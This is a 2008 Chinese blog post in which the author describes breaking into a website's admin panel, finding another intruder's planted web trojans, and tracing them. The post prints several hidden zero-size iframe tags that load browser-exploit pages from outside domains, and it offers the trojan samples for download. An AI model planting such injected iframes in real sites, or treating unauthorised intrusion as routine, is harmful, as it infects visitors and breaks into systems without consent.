首页 > 网络安全 > 截获网马

截获网马

2008年3月31日 发表评论 阅读评论

日了一个站,进后台挂马了,X他妈的。。反正没事,就查他一下,看他挂什么马。。

一共挂了四个页面,不过连过来连过去就两个溢出的马。。这家伙真够笨的,插马也不会插,而且插那么多还是两个马。郁闷。。。
懒人小G做过这样的视频教程。。呵呵。大家可以去看一下。

看下详情:

第一个页面:http://sp.070808.net/23.htm 包含:

<iframe src=http://w.bmwoo.com/w6.htm width=100 height=0></iframe>   站长统计
       http://w.bmwoo.com/nb.htm    溢出洞
              http://w.bmwoo.com/nc.htm  溢出洞          

<iframe src="http://boc.sbb22.com/sb.htm" width=0 height=0></iframe>
      http://adsl.jk33581.com/web/6619038.htm 一个51la统计,
            连到http://adsl.jk33581.com/web/htm.html,又一个溢出洞
<iframe src=http://wb.shijiediyi.net/one/huai4.htm?017 width=1 height=1></iframe>
       包含一个51la统计,一个页面:http://wb.shijiediyi.net/wm/new.htm,又一个溢出马
<iframe src="http://wx.uuzzvv.com/m.htm" width=0 height=0></iframe>
   连到:http://196y.cncz.us/new196.htm,包含一个51la,两个页面:
      http://196y.cncz.us/w/u.html 一个溢出洞。
      http://196y.cncz.us/20080318/u.html 一个溢出洞。

第二个页面:http://w.aeaer.com/ae.htm 包含:
  http://w.bmwoo.com/w6.htm   这个跟第一个页面中第一个地址一样。
    http://w.aeaer.com/i.htm 连到:http://adsl.jk33581.com/web/6619038.htm  这个也是前面那个一样。
    http://wb.shijiediyi.net/one/huai4.htm?017  同上。
    http://wx.uuzzvv.com/m.htm  连到:http://196y.cncz.us/new196.htm 同上。。

第三个页面:http://qi.ccbtv.net/btv.htm 包含:

    <iframe src=http://w.bmwoo.com/w6.htm width=100 height=0></iframe> 同上。
    <iframe src="http://qi.ccbtv.net/v.htm" width=0 height=0></iframe> 连到:                         http://adsl.jk33581.com/web/6619038.htm 同上。
    <iframe src=http://wb.shijiediyi.net/one/huai4.htm?017 width=1 height=1></iframe> 同上。
    <iframe src="http://wx.uuzzvv.com/m.htm" width=0 height=0></iframe>同上。。

第四个页面。。http://88.881215.com/88.htm   同上。

 <iframe src=http://w.bmwoo.com/w6.htm width=100 height=0></iframe>
 <iframe src="http://88.881215.com/in.htm" width=0 height=0></iframe>
 <iframe src="http://wx.uuzzvv.com/m.htm" width=0 height=0></iframe>
 <iframe src=http://wb.shijiediyi.net/one/huai4.htm?017 width=1 height=1></iframe>

第五个页面:http://ca.winvv.com/cn.htm

<iframe src=http://w.bmwoo.com/w6.htm width=100 height=0></iframe>
<iframe src="http://ca.winvv.com/ie.htm" width=0 height=0></iframe>
<iframe src="http://wx.uuzzvv.com/m.htm" width=0 height=0></iframe>
<iframe src=http://wb.shijiediyi.net/one/huai4.htm?017 width=1 height=1></iframe>

图片:

这是一其中一只网马:

挂了好多马,不过对比一下还是就两个马:

两只马的下载地址:本地下载
欢迎大家研究!

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:截获网马
本文地址:http://www.woyigui.cn/2008/03/31/ma-intercepted-network/

  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*